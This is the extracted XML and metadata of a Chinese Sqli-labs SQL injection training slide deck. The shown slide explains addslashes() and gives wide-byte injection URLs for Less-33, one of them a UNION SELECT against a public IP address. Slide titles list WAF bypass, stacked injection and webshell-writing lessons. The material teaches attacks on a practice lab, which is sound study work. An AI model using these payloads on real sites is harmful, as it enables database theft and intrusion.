              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其作用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数返回在预定义字符之前添加反斜杠的字符串。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考链接：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.w3school.com.cn/php/func_string_addslashes.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>： 直接使用宽字节的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/Less-33/?id=1%df’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>法二：自定义闭合</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://121.199.30.46/Less-33/?id=-1%aa%5c%27 union select 1,2,3--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其实和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关基本相同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365201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自定义 2">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FFC000"/>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5444</TotalTime>
  <Words>18332</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>967</Paragraphs>
  <Slides>121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121</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="127" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>天体</vt:lpstr>
      <vt:lpstr>Sqli-labs系列教程 </vt:lpstr>
      <vt:lpstr>目的</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Sqli-labs、phpstudy下载和安装</vt:lpstr>
      <vt:lpstr>Sqli-labs、docker下载安装_01</vt:lpstr>
      <vt:lpstr>Sqli-labs、docker下载安装_02</vt:lpstr>
      <vt:lpstr>Docker简单基础命令</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Less-1_01</vt:lpstr>
      <vt:lpstr>Less-1_02</vt:lpstr>
      <vt:lpstr>Less-2</vt:lpstr>
      <vt:lpstr>Less-3</vt:lpstr>
      <vt:lpstr>Less-4</vt:lpstr>
      <vt:lpstr>补充基础知识</vt:lpstr>
      <vt:lpstr>Less-5 bool型-1</vt:lpstr>
      <vt:lpstr>Less-5 bool型-2</vt:lpstr>
      <vt:lpstr>Less-6</vt:lpstr>
      <vt:lpstr>补充基础知识</vt:lpstr>
      <vt:lpstr>Less-7</vt:lpstr>
      <vt:lpstr>Less-8_01 法一 布尔盲注</vt:lpstr>
      <vt:lpstr>Less-8_02 法一 布尔盲注</vt:lpstr>
      <vt:lpstr>补充知识</vt:lpstr>
      <vt:lpstr>Less-8_01 法二  时间盲注</vt:lpstr>
      <vt:lpstr>Less-9</vt:lpstr>
      <vt:lpstr>Less-10</vt:lpstr>
      <vt:lpstr>tips</vt:lpstr>
      <vt:lpstr>Less-11_01</vt:lpstr>
      <vt:lpstr>Less-11_02</vt:lpstr>
      <vt:lpstr>Less-12_01</vt:lpstr>
      <vt:lpstr>Less-12_02</vt:lpstr>
      <vt:lpstr>Less-13_01</vt:lpstr>
      <vt:lpstr>Less-13_02</vt:lpstr>
      <vt:lpstr>Less-14</vt:lpstr>
      <vt:lpstr>Less-15</vt:lpstr>
      <vt:lpstr>Less-16</vt:lpstr>
      <vt:lpstr>补充知识</vt:lpstr>
      <vt:lpstr>Less-17</vt:lpstr>
      <vt:lpstr>Less-18</vt:lpstr>
      <vt:lpstr>Less-19</vt:lpstr>
      <vt:lpstr>Less-20</vt:lpstr>
      <vt:lpstr>Less-21</vt:lpstr>
      <vt:lpstr>Less-22</vt:lpstr>
      <vt:lpstr>更正</vt:lpstr>
      <vt:lpstr>Less-23_01</vt:lpstr>
      <vt:lpstr>Less-23_02</vt:lpstr>
      <vt:lpstr>补充知识_sql语句解析顺序_01</vt:lpstr>
      <vt:lpstr>补充知识_sql语句解析顺序_02</vt:lpstr>
      <vt:lpstr>补充知识_sql语句解析顺序_03</vt:lpstr>
      <vt:lpstr>Less-23_03</vt:lpstr>
      <vt:lpstr>Less-23_04</vt:lpstr>
      <vt:lpstr>Less-23_04</vt:lpstr>
      <vt:lpstr>补充知识_二次注入</vt:lpstr>
      <vt:lpstr>Less-24_01</vt:lpstr>
      <vt:lpstr>Less-24_02</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_01</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_02</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_03</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_04</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_05</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_06</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_07</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_08</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_09</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_10</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_11</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_12</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_13</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_14</vt:lpstr>
      <vt:lpstr>补充知识_sql注入WAF绕过_15</vt:lpstr>
      <vt:lpstr>Less-25_01</vt:lpstr>
      <vt:lpstr>Less-25_02</vt:lpstr>
      <vt:lpstr>Less-25_03</vt:lpstr>
      <vt:lpstr>Less-25a_01</vt:lpstr>
      <vt:lpstr>Less-25a_02</vt:lpstr>
      <vt:lpstr>补充知识_空格url编码替换</vt:lpstr>
      <vt:lpstr>Less-26_01</vt:lpstr>
      <vt:lpstr>Less-26_02</vt:lpstr>
      <vt:lpstr>Less-26_03</vt:lpstr>
      <vt:lpstr>Less-26_04</vt:lpstr>
      <vt:lpstr>Less-26a</vt:lpstr>
      <vt:lpstr>Less-27_01</vt:lpstr>
      <vt:lpstr>Less-27_02</vt:lpstr>
      <vt:lpstr>Less-27a_01</vt:lpstr>
      <vt:lpstr>Less-27A_02</vt:lpstr>
      <vt:lpstr>Less-28_01</vt:lpstr>
      <vt:lpstr>Less-28_02</vt:lpstr>
      <vt:lpstr>Less-28_03</vt:lpstr>
      <vt:lpstr>Less-28_02</vt:lpstr>
      <vt:lpstr>Less-28a_01</vt:lpstr>
      <vt:lpstr>Less-28a_02</vt:lpstr>
      <vt:lpstr>环境搭建</vt:lpstr>
      <vt:lpstr>补充知识_服务器两层架构</vt:lpstr>
      <vt:lpstr>Less-29</vt:lpstr>
      <vt:lpstr>Less-30</vt:lpstr>
      <vt:lpstr>Less-31</vt:lpstr>
      <vt:lpstr>补充知识_宽字节注入</vt:lpstr>
      <vt:lpstr>Less-32_01</vt:lpstr>
      <vt:lpstr>Less-32_02</vt:lpstr>
      <vt:lpstr>Less-33</vt:lpstr>
      <vt:lpstr>Less-34_01</vt:lpstr>
      <vt:lpstr>Less-34_02</vt:lpstr>
      <vt:lpstr>Less-35</vt:lpstr>
      <vt:lpstr>Less-36</vt:lpstr>
      <vt:lpstr>Less-37</vt:lpstr>
      <vt:lpstr>补充知识_堆叠注入</vt:lpstr>
      <vt:lpstr>Less-38</vt:lpstr>
      <vt:lpstr>Less-39</vt:lpstr>
      <vt:lpstr>Less-40</vt:lpstr>
      <vt:lpstr>Less-41</vt:lpstr>
      <vt:lpstr>Less-42</vt:lpstr>
      <vt:lpstr>Less-43</vt:lpstr>
      <vt:lpstr>Less-44</vt:lpstr>
      <vt:lpstr>Less-45</vt:lpstr>
      <vt:lpstr>总结_堆叠注入写一句话木马</vt:lpstr>
      <vt:lpstr>补充知识_mysql知识补充</vt:lpstr>
      <vt:lpstr>Less-46</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crow</dc:creator>
  <cp:lastModifiedBy>crow</cp:lastModifiedBy>
  <cp:revision>386</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-19T13:02:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-19T03:32:18Z</dcterms:modified>
</cp:coreProperties>
</file>